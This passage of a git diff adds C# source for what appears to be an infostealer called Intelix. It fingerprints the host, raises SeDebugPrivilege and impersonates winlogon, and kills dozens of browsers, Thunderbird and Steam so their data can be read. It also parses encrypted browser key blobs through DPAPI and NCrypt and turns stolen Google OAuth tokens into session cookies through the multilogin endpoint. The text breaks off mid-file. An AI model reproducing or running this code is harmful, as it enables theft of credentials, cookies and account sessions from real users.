RegistryKey registryKey2 = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry32).OpenSubKey("SOFTWARE\\Microsoft\\Cryptography"); + return (registryKey2?.GetValue("MachineGuid") as string)?.Trim() ?? ""; + } + catch + { + return ""; + } + } + + private static string GetCpuName() + { + try + { + using RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0"); + string text = registryKey?.GetValue("ProcessorNameString") as string; + if (!string.IsNullOrEmpty(text)) + { + return text.Trim(); + } + return (registryKey?.GetValue("VendorIdentifier") as string)?.Trim() ?? ""; + } + catch + { + return ""; + } + } + + private static List GetFixedVolumeSerials() + { + List list = new List(); + try + { + DriveInfo[] drives = DriveInfo.GetDrives(); + foreach (DriveInfo driveInfo in drives) + { + if (driveInfo.DriveType == DriveType.Fixed && driveInfo.IsReady) + { + StringBuilder stringBuilder = new StringBuilder(261); + StringBuilder stringBuilder2 = new StringBuilder(261); + if (NativeMethods.GetVolumeInformation(driveInfo.RootDirectory.FullName, stringBuilder, stringBuilder.Capacity, out var lpVolumeSerialNumber, out var _, out var _, stringBuilder2, stringBuilder2.Capacity)) + { + list.Add(lpVolumeSerialNumber.ToString("X8").ToLowerInvariant()); + } + } + } + } + catch + { + } + return list; + } + + private static List GetMacAddresses() + { + List list = new List(); + try + { + NetworkInterface[] allNetworkInterfaces = NetworkInterface.GetAllNetworkInterfaces(); + foreach (NetworkInterface networkInterface in allNetworkInterfaces) + { + if (networkInterface.OperationalStatus != OperationalStatus.Up) + { + continue; + } + byte[] addressBytes = networkInterface.GetPhysicalAddress().GetAddressBytes(); + if (addressBytes.Length == 0) + { + continue; + } + StringBuilder stringBuilder = new StringBuilder(); + for (int j = 0; j < addressBytes.Length; j++) + { + if (j > 0) + { + stringBuilder.Append(':'); + } + stringBuilder.Append(addressBytes[j].ToString("x2")); + } + list.Add(stringBuilder.ToString()); + } + } + catch + { + } + return list; + } +} diff --git a/New/Intelix.Helper/ImpersonationHelper.cs b/New/Intelix.Helper/ImpersonationHelper.cs new file mode 100644 index 0000000..7679efe --- /dev/null +++ b/New/Intelix.Helper/ImpersonationHelper.cs @@ -0,0 +1,110 @@ +using System; +using System.ComponentModel; +using System.Diagnostics; +using System.Linq; +using System.Runtime.InteropServices; + +namespace Intelix.Helper; + +public static class ImpersonationHelper +{ + private class ImpersonationContext : IDisposable + { + public void Dispose() + { + NativeMethods.RevertToSelf(); + } + } + + private const uint TOKEN_DUPLICATE = 2u; + + private const uint TOKEN_IMPERSONATE = 4u; + + private const uint TOKEN_QUERY = 8u; + + private const uint TOKEN_ADJUST_PRIVILEGES = 32u; + + private const uint SecurityImpersonation = 2u; + + private const uint TokenImpersonation = 2u; + + private const uint SE_PRIVILEGE_ENABLED = 2u; + + public static IDisposable ImpersonateWinlogon() + { + IntPtr TokenHandle = IntPtr.Zero; + IntPtr phNewToken = IntPtr.Zero; + try + { + EnableDebugPrivilege(); + if (!NativeMethods.OpenProcessToken((Process.GetProcessesByName("winlogon").FirstOrDefault() ?? throw new Exception("Процесс winlogon.exe не найден")).Handle, 14u, out TokenHandle)) + { + throw new Win32Exception(Marshal.GetLastWin32Error(), "Ошибка OpenProcessToken"); + } + if (!NativeMethods.DuplicateTokenEx(TokenHandle, 12u, IntPtr.Zero, 2u, 2u, out phNewToken)) + { + throw new Win32Exception(Marshal.GetLastWin32Error(), "Ошибка DuplicateTokenEx"); + } + if (!NativeMethods.ImpersonateLoggedOnUser(phNewToken)) + { + throw new Win32Exception(Marshal.GetLastWin32Error(), "Ошибка ImpersonateLoggedOnUser"); + } + return new ImpersonationContext(); + } + catch + { + if (phNewToken != IntPtr.Zero) + { + NativeMethods.CloseHandle(phNewToken); + } + if (TokenHandle != IntPtr.Zero) + { + NativeMethods.CloseHandle(TokenHandle); + } + NativeMethods.RevertToSelf(); + throw; + } + } + + private static void EnableDebugPrivilege() + { + IntPtr TokenHandle = IntPtr.Zero; + try + { + if (!NativeMethods.OpenProcessToken(NativeMethods.GetCurrentProcess(), 40u, out TokenHandle)) + { + int lastWin32Error = Marshal.GetLastWin32Error(); + throw new Win32Exception(lastWin32Error, $"Ошибка OpenProcessToken: Код ошибки {lastWin32Error}"); + } + NativeMethods.LUID lpLuid = default(NativeMethods.LUID); + if (!NativeMethods.LookupPrivilegeValue(null, "SeDebugPrivilege", ref lpLuid)) + { + int lastWin32Error2 = Marshal.GetLastWin32Error(); + throw new Win32Exception(lastWin32Error2, $"Ошибка LookupPrivilegeValue: Код ошибки {lastWin32Error2}"); + } + NativeMethods.TOKEN_PRIVILEGES NewState = new NativeMethods.TOKEN_PRIVILEGES + { + PrivilegeCount = 1u, + Luid = lpLuid, + Attributes = 2u + }; + if (!NativeMethods.AdjustTokenPrivileges(TokenHandle, DisableAllPrivileges: false, ref NewState, (uint)Marshal.SizeOf(typeof(NativeMethods.TOKEN_PRIVILEGES)), IntPtr.Zero, IntPtr.Zero)) + { + int lastWin32Error3 = Marshal.GetLastWin32Error(); + throw new Win32Exception(lastWin32Error3, $"Ошибка AdjustTokenPrivileges: Код ошибки {lastWin32Error3}"); + } + int lastWin32Error4 = Marshal.GetLastWin32Error(); + if (lastWin32Error4 != 0) + { + throw new Win32Exception(lastWin32Error4, $"AdjustTokenPrivileges вернул успех, но установил код ошибки {lastWin32Error4}"); + } + } + finally + { + if (TokenHandle != IntPtr.Zero) + { + NativeMethods.CloseHandle(TokenHandle); + } + } + } +} diff --git a/New/Intelix.Helper/IpApi.cs b/New/Intelix.Helper/IpApi.cs new file mode 100644 index 0000000..089307e --- /dev/null +++ b/New/Intelix.Helper/IpApi.cs @@ -0,0 +1,39 @@ +using System.Net; + +namespace Intelix.Helper; + +public static class IpApi +{ + private static string _cachedIp; + + private static readonly object _lock = new object(); + + public static string GetPublicIp() + { + if (!string.IsNullOrEmpty(_cachedIp)) + { + return _cachedIp; + } + lock (_lock) + { + if (!string.IsNullOrEmpty(_cachedIp)) + { + return _cachedIp; + } + try + { + using WebClient webClient = new WebClient(); + string text = webClient.DownloadString("http://icanhazip.com"); + if (!string.IsNullOrEmpty(text)) + { + _cachedIp = text.Trim(); + } + } + catch + { + _cachedIp = "Request failed"; + } + return _cachedIp; + } + } +} diff --git a/New/Intelix.Helper/MutexControl.cs b/New/Intelix.Helper/MutexControl.cs new file mode 100644 index 0000000..933fd78 --- /dev/null +++ b/New/Intelix.Helper/MutexControl.cs @@ -0,0 +1,16 @@ +using System.Threading; + +namespace Intelix.Helper; + +public static class MutexControl +{ + public static Mutex currentApp; + + public static bool createdNew; + + public static bool CreateMutex(string mtx) + { + currentApp = new Mutex(initiallyOwned: false, mtx, out createdNew); + return createdNew; + } +} diff --git a/New/Intelix.Helper/NativeMethods.cs b/New/Intelix.Helper/NativeMethods.cs new file mode 100644 index 0000000..b389561 --- /dev/null +++ b/New/Intelix.Helper/NativeMethods.cs @@ -0,0 +1,194 @@ +using System; +using System.Runtime.InteropServices; +using System.Text; + +namespace Intelix.Helper; + +public static class NativeMethods +{ + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + public struct CryptprotectPromptstruct + { + public int cbSize; + + public int dwPromptFlags; + + public IntPtr hwndApp; + + public string szPrompt; + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + public struct DataBlob + { + public int cbData; + + public IntPtr pbData; + } + + public struct LUID + { + public uint LowPart; + + public int HighPart; + } + + public struct TOKEN_PRIVILEGES + { + public uint PrivilegeCount; + + public LUID Luid; + + public uint Attributes; + } + + public struct MEMORYSTATUSEX + { + public uint dwLength; + + public uint dwMemoryLoad; + + public ulong ullTotalPhys; + + public ulong ullAvailPhys; + + public ulong ullTotalPageFile; + + public ulong ullAvailPageFile; + + public ulong ullTotalVirtual; + + public ulong ullAvailVirtual; + + public ulong ullAvailExtendedVirtual; + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + public struct DISPLAY_DEVICE + { + public int cb; + + [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 32)] + public string DeviceName; + + [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)] + public string DeviceString; + + public uint StateFlags; + + [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)] + public string DeviceID; + + [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)] + public string DeviceKey; + } + + public struct PROCESS_MEMORY_COUNTERS_EX + { + public uint cb; + + public uint PageFaultCount; + + public UIntPtr PeakWorkingSetSize; + + public UIntPtr WorkingSetSize; + + public UIntPtr QuotaPeakPagedPoolUsage; + + public UIntPtr QuotaPagedPoolUsage; + + public UIntPtr QuotaPeakNonPagedPoolUsage; + + public UIntPtr QuotaNonPagedPoolUsage; + + public UIntPtr PagefileUsage; + + public UIntPtr PeakPagefileUsage; + + public UIntPtr PrivateUsage; + } + + [DllImport("psapi.dll", SetLastError = true)] + public static extern bool GetProcessMemoryInfo(IntPtr hProcess, out PROCESS_MEMORY_COUNTERS_EX ppsmemCounters, uint cb); + + [DllImport("psapi.dll", SetLastError = true)] + public static extern bool EnumProcesses([Out] uint[] lpidProcess, uint cb, out uint lpcbNeeded); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern bool TerminateProcess(IntPtr hProcess, uint uExitCode); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern bool GetVolumeInformation(string lpRootPathName, StringBuilder lpVolumeNameBuffer, int nVolumeNameSize, out uint lpVolumeSerialNumber, out uint lpMaximumComponentLength, out uint lpFileSystemFlags, StringBuilder lpFileSystemNameBuffer, int nFileSystemNameSize); + + [DllImport("kernel32.dll")] + public static extern bool GlobalMemoryStatusEx(ref MEMORYSTATUSEX lpBuffer); + + [DllImport("user32.dll", CharSet = CharSet.Unicode)] + public static extern bool EnumDisplayDevices(string lpDevice, uint iDevNum, ref DISPLAY_DEVICE lpDisplayDevice, uint dwFlags); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); + + [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] + public static extern bool QueryFullProcessImageName(IntPtr hProcess, int dwFlags, StringBuilder lpExeName, ref int lpdwSize); + + [DllImport("ncrypt.dll", CharSet = CharSet.Unicode)] + public static extern int NCryptOpenStorageProvider(out IntPtr phProvider, string pszProviderName, int dwFlags); + + [DllImport("ncrypt.dll", CharSet = CharSet.Unicode)] + public static extern int NCryptOpenKey(IntPtr hProvider, out IntPtr phKey, string pszKeyName, int dwLegacyKeySpec, int dwFlags); + + [DllImport("ncrypt.dll", CharSet = CharSet.Unicode)] + public static extern int NCryptDecrypt(IntPtr hKey, byte[] pbInput, int cbInput, IntPtr pPaddingInfo, byte[] pbOutput, int cbOutput, out int pcbResult, int dwFlags); + + [DllImport("ncrypt.dll", CharSet = CharSet.Unicode)] + public static extern int NCryptFreeObject(IntPtr hObject); + + [DllImport("user32.dll")] + public static extern IntPtr GetDesktopWindow(); + + [DllImport("user32.dll")] + public static extern IntPtr GetWindowDC(IntPtr hWnd); + + [DllImport("user32.dll")] + public static extern int ReleaseDC(IntPtr hWnd, IntPtr hDC); + + [DllImport("gdi32.dll")] + public static extern bool BitBlt(IntPtr hdcDest, int nXDest, int nYDest, int nWidth, int nHeight, IntPtr hdcSrc, int nXSrc, int nYSrc, int dwRop); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId); + + [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] + public static extern bool QueryFullProcessImageName(IntPtr hProcess, int dwFlags, StringBuilder exeName, ref uint lpdwSize); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern bool CloseHandle(IntPtr hObject); + + [DllImport("crypt32.dll", CharSet = CharSet.Unicode, SetLastError = true)] + public static extern bool CryptUnprotectData(ref DataBlob pDataIn, ref string ppszDataDescr, ref DataBlob pOptionalEntropy, IntPtr pvReserved, ref CryptprotectPromptstruct pPromptStruct, int dwFlags, ref DataBlob pDataOut); + + [DllImport("advapi32.dll", SetLastError = true)] + public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle); + + [DllImport("advapi32.dll", SetLastError = true)] + public static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes, uint ImpersonationLevel, uint TokenType, out IntPtr phNewToken); + + [DllImport("advapi32.dll", SetLastError = true)] + public static extern bool ImpersonateLoggedOnUser(IntPtr hToken); + + [DllImport("advapi32.dll", SetLastError = true)] + public static extern bool RevertToSelf(); + + [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)] + public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, ref LUID lpLuid); + + [DllImport("advapi32.dll", SetLastError = true)] + public static extern bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges, ref TOKEN_PRIVILEGES NewState, uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern IntPtr GetCurrentProcess(); +} diff --git a/New/Intelix.Helper/ParseKeyBlob.cs b/New/Intelix.Helper/ParseKeyBlob.cs new file mode 100644 index 0000000..93f1e1e --- /dev/null +++ b/New/Intelix.Helper/ParseKeyBlob.cs @@ -0,0 +1,66 @@ +using System; +using System.IO; + +namespace Intelix.Helper; + +public static class ParseKeyBlob +{ + public static BlobParsedData Parse(byte[] blobData) + { + using MemoryStream memoryStream = new MemoryStream(blobData); + using BinaryReader binaryReader = new BinaryReader(memoryStream); + uint count = binaryReader.ReadUInt32(); + binaryReader.ReadBytes((int)count); + uint num = binaryReader.ReadUInt32(); + _ = memoryStream.Position; + byte[] array = null; + byte[] iv = null; + byte[] ciphertext = null; + byte[] tag = null; + if (num == 32) + { + array = binaryReader.ReadBytes(32); + return new BlobParsedData + { + Flag = 32, + Iv = iv, + Ciphertext = ciphertext, + Tag = tag, + EncryptedAesKey = array + }; + } + byte b = binaryReader.ReadByte(); + switch (b) + { + case 1: + case 2: + iv = binaryReader.ReadBytes(12); + ciphertext = binaryReader.ReadBytes(32); + tag = binaryReader.ReadBytes(16); + return new BlobParsedData + { + Flag = b, + Iv = iv, + Ciphertext = ciphertext, + Tag = tag, + EncryptedAesKey = null + }; + case 3: + case 35: + array = binaryReader.ReadBytes(32); + iv = binaryReader.ReadBytes(12); + ciphertext = binaryReader.ReadBytes(32); + tag = binaryReader.ReadBytes(16); + return new BlobParsedData + { + Flag = b, + Iv = iv, + Ciphertext = ciphertext, + Tag = tag, + EncryptedAesKey = array + }; + default: + throw new Exception(); + } + } +} diff --git a/New/Intelix.Helper/ProcessKiller.cs b/New/Intelix.Helper/ProcessKiller.cs new file mode 100644 index 0000000..4e57743 --- /dev/null +++ b/New/Intelix.Helper/ProcessKiller.cs @@ -0,0 +1,153 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Threading.Tasks; + +namespace Intelix.Helper; + +public static class ProcessKiller +{ + public static string[] Targets = new string[63] + { + "k-meleon.exe", "thunderbird.exe", "icedragon.exe", "cyberfox.exe", "blackhawk.exe", "palemoon.exe", "ghostery.exe", + "sielo.exe", "conkeror.exe", "msedge.exe", "netscape.exe", "seamonkey.exe", "slimbrowser.exe", "msedge_pwa_launcher.exe", "avant.exe", "opera.exe", "operagx.exe", + "msedgewebview2.exe", "msedgewebview.exe", "chromium.exe", "slimjet.exe", "chrome.exe", "browser.exe", "vivaldi.exe", "brave.exe", "edge.exe", "microsoft.exe", + "dragon.exe", "torch.exe", "yandex.exe", "sputnik.exe", "nichrome.exe", "msedge_proxy.exe", "cocbrowser.exe", + "uran.exe", "msedge_proxy.exe", "chromodo.exe", "atom.exe", "bravebrowser.exe", "steam.exe", "cryptotab.exe", "ghostbrowser.exe", "maelstrom.exe", "kinza.exe", + "globus.exe", "falkon.exe", "elementbrowser.exe", "colibri.exe", "whale.exe", "avastbrowser.exe", "ucbrowser.exe", "maxthon.exe", "blisk.exe", "aolshield.exe", + "baidubrowser.exe", "ccleanerbrowser.exe", "hola.exe", "xvast.exe", "kingpin.exe", "qqbrowser.exe", "private_browsing.exe", "chrome_pwa_launcher.exe", "chrome_proxy.exe" + }; + + private const uint PROCESS_QUERY_LIMITED_INFORMATION = 4096u; + + private const uint PROCESS_TERMINATE = 1u; + + public static void KillerAll() + { + string[] targets = Targets; + if (targets == null || targets.Length == 0) + { + return; + } + HashSet wanted = new HashSet(StringComparer.OrdinalIgnoreCase); + string[] array = targets; + foreach (string text in array) + { + if (string.IsNullOrWhiteSpace(text)) + { + continue; + } + string text2 = text.Trim().Replace("\"", string.Empty); + try + { + text2 = Path.GetFileName(text2); + } + catch + { + } + if (!string.IsNullOrEmpty(text2)) + { + wanted.Add(text2); + if (!text2.EndsWith(".exe", StringComparison.OrdinalIgnoreCase)) + { + wanted.Add(text2 + ".exe"); + } + string fileNameWithoutExtension = Path.GetFileNameWithoutExtension(text2); + if (!string.IsNullOrEmpty(fileNameWithoutExtension)) + { + wanted.Add(fileNameWithoutExtension); + } + } + } + if (wanted.Count == 0) + { + return; + } + List procInfos = ProcessWindows.GetProcInfos(); + if (procInfos == null || procInfos.Count == 0) + { + return; + } + Parallel.ForEach(procInfos, delegate(ProcessWindows.ProcInfo proc) + { + if (proc == null) + { + return; + } + try + { + string text3 = null; + if (!string.IsNullOrEmpty(proc.Path)) + { + try + { + text3 = Path.GetFileName(proc.Path); + } + catch + { + text3 = proc.Path; + } + } + if (string.IsNullOrEmpty(text3)) + { + text3 = proc.Name ?? string.Empty; + } + string item; + try + { + item = Path.GetFileNameWithoutExtension(text3); + } + catch + { + item = text3; + } + if ((!wanted.Contains(text3) && !wanted.Contains(item)) || !int.TryParse(proc.Pid, out var result) || result == 0 || result == 4) + { + return; + } + IntPtr intPtr = IntPtr.Zero; + try + { + intPtr = NativeMethods.OpenProcess(4097u, bInheritHandle: false, (uint)result); + if (intPtr == IntPtr.Zero) + { + intPtr = NativeMethods.OpenProcess(4096u, bInheritHandle: false, (uint)result); + if (!(intPtr != IntPtr.Zero)) + { + return; + } + NativeMethods.CloseHandle(intPtr); + intPtr = NativeMethods.OpenProcess(1u, bInheritHandle: false, (uint)result); + if (intPtr == IntPtr.Zero) + { + return; + } + } + try + { + NativeMethods.TerminateProcess(intPtr, 1u); + } + catch + { + } + } + finally + { + try + { + if (intPtr != IntPtr.Zero) + { + NativeMethods.CloseHandle(intPtr); + } + } + catch + { + } + } + } + catch + { + } + }); + } +} diff --git a/New/Intelix.Helper/ProcessWindows.cs b/New/Intelix.Helper/ProcessWindows.cs new file mode 100644 index 0000000..bbbe5e6 --- /dev/null +++ b/New/Intelix.Helper/ProcessWindows.cs @@ -0,0 +1,250 @@ +using System; +using System.Collections.Concurrent; +using System.Collections.Generic; +using System.IO; +using System.Runtime.InteropServices; +using System.Text; +using System.Threading; +using System.Threading.Tasks; + +namespace Intelix.Helper; + +public static class ProcessWindows +{ + public class ProcInfo + { + public string Name { get; set; } + + public string Pid { get; set; } + + public string Path { get; set; } + + public string Memory { get; set; } + } + + private static readonly Lazy> _procInfos = new Lazy>(BuildCache, isThreadSafe: true); + + public static List GetProcInfos() + { + return new List(_procInfos.Value); + } + + public static List FindFolder(string folderName) + { + if (string.IsNullOrWhiteSpace(folderName)) + { + return new List(); + } + ConcurrentDictionary concurrentDictionary = new ConcurrentDictionary(StringComparer.OrdinalIgnoreCase); + SearchNearby(folderName, isDirectory: true, concurrentDictionary); + return new List(concurrentDictionary.Keys); + } + + public static List FindFile(string fileName) + { + if (string.IsNullOrWhiteSpace(fileName)) + { + return new List(); + } + ConcurrentDictionary concurrentDictionary = new ConcurrentDictionary(StringComparer.OrdinalIgnoreCase); + SearchNearby(fileName, isDirectory: false, concurrentDictionary); + return new List(concurrentDictionary.Keys); + } + + private static void SearchNearby(string target, bool isDirectory, ConcurrentDictionary found, int maxUp = 3) + { + if (string.IsNullOrEmpty(target)) + { + return; + } + List value = _procInfos.Value; + if (value == null || value.Count == 0) + { + return; + } + string t = target.Trim(); + Parallel.ForEach(value, delegate(ProcInfo proc) + { + try + { + string path = proc.Path; + if (!string.IsNullOrEmpty(path)) + { + string directoryName = Path.GetDirectoryName(path); + if (!string.IsNullOrEmpty(directoryName)) + { + for (int i = 0; i < maxUp; i++) + { + if (string.IsNullOrEmpty(directoryName)) + { + break; + } + string path2 = Path.Combine(directoryName, t); + if (isDirectory) + { + if (Directory.Exists(path2)) + { + try + { + found.TryAdd(Path.GetFullPath(path2), 0); + } + catch + { + } + } + } + else if (File.Exists(path2)) + { + try + { + found.TryAdd(Path.GetFullPath(path2), 0); + } + catch + { + } + } + directoryName = Path.GetDirectoryName(directoryName); + } + } + } + } + catch + { + } + }); + } + + private static List BuildCache() + { + ConcurrentDictionary result = new ConcurrentDictionary(StringComparer.OrdinalIgnoreCase); + uint num = 4096u; + uint[] pids = new uint[num]; + if (!NativeMethods.EnumProcesses(pids, num * 4, out var lpcbNeeded)) + { + num = 65536u; + pids = new uint[num]; + if (!NativeMethods.EnumProcesses(pids, num * 4, out lpcbNeeded)) + { + return new List(); + } + } + int num2 = (int)(lpcbNeeded / 4); + if (num2 <= 0) + { + return new List(); + } + ThreadLocal sbLocal = new ThreadLocal(() => new StringBuilder(1024)); + Parallel.For(0, num2, delegate(int i) + { + uint num3 = pids[i]; + if (num3 == 0 || num3 == 4) + { + return; + } + IntPtr intPtr = IntPtr.Zero; + try + { + intPtr = NativeMethods.OpenProcess(5136u, bInheritHandle: false, (int)num3); + if (!(intPtr == IntPtr.Zero)) + { + string text = null; + try + { + StringBuilder value = sbLocal.Value; + value.Clear(); + uint lpdwSize = (uint)value.Capacity; + if (NativeMethods.QueryFullProcessImageName(intPtr, 0, value, ref lpdwSize)) + { + text = value.ToString(0, (int)lpdwSize); + } + } + catch + { + } + string text2 = null; + if (!string.IsNullOrEmpty(text)) + { + try + { + text2 = Path.GetFileNameWithoutExtension(text); + } + catch + { + text2 = text; + } + } + else + { + text2 = ""; + } + string text3 = ""; + try + { + NativeMethods.PROCESS_MEMORY_COUNTERS_EX ppsmemCounters = default(NativeMethods.PROCESS_MEMORY_COUNTERS_EX); + ppsmemCounters.cb = (uint)Marshal.SizeOf(typeof(NativeMethods.PROCESS_MEMORY_COUNTERS_EX)); + if (NativeMethods.GetProcessMemoryInfo(intPtr, out ppsmemCounters, ppsmemCounters.cb)) + { + text3 = FormatBytes((long)ppsmemCounters.WorkingSetSize.ToUInt64()); + } + } + catch + { + } + ProcInfo procInfo = new ProcInfo + { + Name = SafeString(text2), + Pid = num3.ToString(), + Path = SafeString(text), + Memory = (text3 ?? "") + }; + string key = procInfo.Path + "|" + procInfo.Pid; + result.TryAdd(key, procInfo); + } + } + catch + { + } + finally + { + try + { + if (intPtr != IntPtr.Zero) + { + NativeMethods.CloseHandle(intPtr); + } + } + catch + { + } + } + }); + sbLocal.Dispose(); + return new List(result.Values); + } + + private static string SafeString(string s) + { + if (!string.IsNullOrEmpty(s)) + { + return s; + } + return ""; + } + + private static string FormatBytes(long bytes) + { + if (bytes >= 1073741824) + { + return ((double)bytes / 1073741824.0).ToString("0.##") + " GB"; + } + if (bytes >= 1048576) + { + return ((double)bytes / 1048576.0).ToString("0.##") + " MB"; + } + if (bytes >= 1024) + { + return ((double)bytes / 1024.0).ToString("0.##") + " KB"; + } + return bytes + " B"; + } +} diff --git a/New/Intelix.Helper/RandomStrings.cs b/New/Intelix.Helper/RandomStrings.cs new file mode 100644 index 0000000..b772994 --- /dev/null +++ b/New/Intelix.Helper/RandomStrings.cs @@ -0,0 +1,29 @@ +using System; +using System.Linq; + +namespace Intelix.Helper; + +public static class RandomStrings +{ + private const string Ascii = "abcdefghijklmnopqrstuvwxyz"; + + private static readonly Random Random = new Random(); + + public static string GenerateHashTag() + { + return " #" + GenerateString(); + } + + public static string GenerateString() + { + return GenerateString(5); + } + + public static string GenerateString(int length) + { + char c = "abcdefghijklmnopqrstuvwxyz"[Random.Next("abcdefghijklmnopqrstuvwxyz".Length)]; + char[] value = (from s in Enumerable.Repeat("abcdefghijklmnopqrstuvwxyz", length - 1) + select s[Random.Next(s.Length)]).ToArray(); + return c + new string(value); + } +} diff --git a/New/Intelix.Helper/RegistryParser.cs b/New/Intelix.Helper/RegistryParser.cs new file mode 100644 index 0000000..f9e38c8 --- /dev/null +++ b/New/Intelix.Helper/RegistryParser.cs @@ -0,0 +1,45 @@ +using System; +using System.Collections.Generic; +using Microsoft.Win32; + +namespace Intelix.Helper; + +public static class RegistryParser +{ + public static List ParseKey(RegistryKey key) + { + List list = new List(); + if (key == null) + { + return list; + } + string[] valueNames = key.GetValueNames(); + foreach (string text in valueNames) + { + object value = key.GetValue(text); + string text2; + switch (key.GetValueKind(text)) + { + case RegistryValueKind.Binary: + text2 = ((!(value is byte[] array)) ? "null" : BitConverter.ToString(array).Replace("-", "")); + break; + case RegistryValueKind.DWord: + case RegistryValueKind.QWord: + text2 = value.ToString(); + break; + case RegistryValueKind.String: + case RegistryValueKind.ExpandString: + text2 = value?.ToString() ?? "null"; + break; + case RegistryValueKind.MultiString: + text2 = ((!(value is string[] value2)) ? "null" : string.Join(", ", value2)); + break; + default: + text2 = value?.ToString() ?? "null"; + break; + } + list.Add(text + ": " + text2); + } + return list; + } +} diff --git a/New/Intelix.Helper/RestoreCookies.cs b/New/Intelix.Helper/RestoreCookies.cs new file mode 100644 index 0000000..ba256ec --- /dev/null +++ b/New/Intelix.Helper/RestoreCookies.cs @@ -0,0 +1,180 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Net; +using System.Text; +using System.Text.RegularExpressions; + +namespace Intelix.Helper; + +public static class RestoreCookies +{ + public class Account + { + public string type { get; set; } + + public string display_name { get; set; } + + public string display_email { get; set; } + + public string photo_url { get; set; } + + public bool selected { get; set; } + + public bool default_user { get; set; } + + public int authuser { get; set; } + + public bool valid_session { get; set; } + + public string obfuscated_id { get; set; } + + public bool is_verified { get; set; } + } + + public class Cookie + { + public string name { get; set; } + + public string value { get; set; } + + public string domain { get; set; } + + public string path { get; set; } + + public bool isSecure { get; set; } + + public bool isHttpOnly { get; set; } + + public int maxAge { get; set; } + + public string priority { get; set; } + + public string sameParty { get; set; } + + public string sameSite { get; set; } + + public string host { get; set; } + } + + public class Root + { + public string status { get; set; } + + public List cookies { get; set; } + + public List accounts { get; set; } + } + + private static string SendPostRequest(string token) + { + try + { + HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create("https://accounts.google.com/oauth/multilogin?source=com.google.Drive"); + httpWebRequest.Method = "POST"; + httpWebRequest.ContentType = "application/x-www-form-urlencoded"; + httpWebRequest.Headers.Add("Authorization", "MultiBearer " + token); + httpWebRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) com.google.Drive/6.0.230903 iSL/3.4 (gzip)\r\n"; + string s = ""; + byte[] bytes = Encoding.UTF8.GetBytes(s); + using (Stream stream = httpWebRequest.GetRequestStream()) + { + stream.Write(bytes, 0, bytes.Length); + } + using HttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse(); + if (httpWebResponse.StatusCode == HttpStatusCode.OK) + { + using (StreamReader streamReader = new StreamReader(httpWebResponse.GetResponseStream())) + { + return streamReader.ReadToEnd(); + } + } + } + catch (Exception) + { + } + return string.Empty; + } + + public static string CRestore(string restore) + { + try + { + string text = SendPostRequest(restore); + if (string.IsNullOrEmpty(text)) + { + return string.Empty; + } + text = text.Remove(0, 5); + Root obj = new Root + { + status = Regex.Match(text, "\"status\":\"(.*?)\"").Groups[1].Value, + cookies = ExtractCookies(text), + accounts = ExtractAccounts(text) + }; + StringBuilder stringBuilder = new StringBuilder(); + foreach (Cookie cookie in obj.cookies) + { + string text2 = (string.IsNullOrEmpty(cookie.host) ? cookie.domain : cookie.host); + text2 = (string.IsNullOrEmpty(text2) ? ".google.com" : text2); + stringBuilder.AppendLine(text2 + "\tTRUE\t" + cookie.path + "\tFALSE\t" + cookie.maxAge + "\t" + cookie.name + "\t" + cookie.value); + } + return stringBuilder.ToString(); + } + catch + { + } + return string.Empty; + } + + private static List ExtractCookies(string json) + { + List list = new List(); + foreach (Match item2 in Regex.Matches(json, "{(.*?)}")) + { + string value = item2.Value; + int result; + Cookie item = new Cookie + { + name = Regex.Match(value, "\"name\":\"(.*?)\"").Groups[1].Value, + value = Regex.Match(value, "\"value\":\"(.*?)\"").Groups[1].Value, + domain = Regex.Match(value, "\"domain\":\"(.*?)\"").Groups[1].Value, + path = Regex.Match(value, "\"path\":\"(.*?)\"").Groups[1].Value, + isSecure = Regex.IsMatch(value, "\"isSecure\":true"), + isHttpOnly = Regex.IsMatch(value, "\"isHttpOnly\":true"), + maxAge = (int.TryParse(Regex.Match(value, "\"maxAge\":(\\d+)").Groups[1].Value, out result) ? result : 0), + priority = Regex.Match(value, "\"priority\":\"(.*?)\"").Groups[1].Value, + sameParty = Regex.Match(value, "\"sameParty\":\"(.*?)\"").Groups[1].Value, + sameSite = Regex.Match(value, "\"sameSite\":\"(.*?)\"").Groups[1].Value, + host = Regex.Match(value, "\"host\":\"(.*?)\"").Groups[1].Value + }; + list.Add(item); + } + return list; + } + + private static List ExtractAccounts(string json) + { + List list = new List(); + foreach (Match item2 in Regex.Matches(json, "{(.*?)}")) + { + string value = item2.Value; + int result; + Account item = new Account + { + type = Regex.Match(value, 